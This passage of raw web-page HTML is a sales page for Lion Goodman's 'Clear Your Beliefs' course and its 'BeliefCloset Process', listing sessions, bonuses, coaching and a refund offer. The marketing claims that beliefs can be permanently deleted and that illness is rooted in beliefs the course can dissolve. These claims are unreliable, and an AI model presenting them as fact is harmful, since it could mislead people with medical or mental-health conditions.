that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n</p>\n<em>\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong></p>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong></p>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong></p>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for 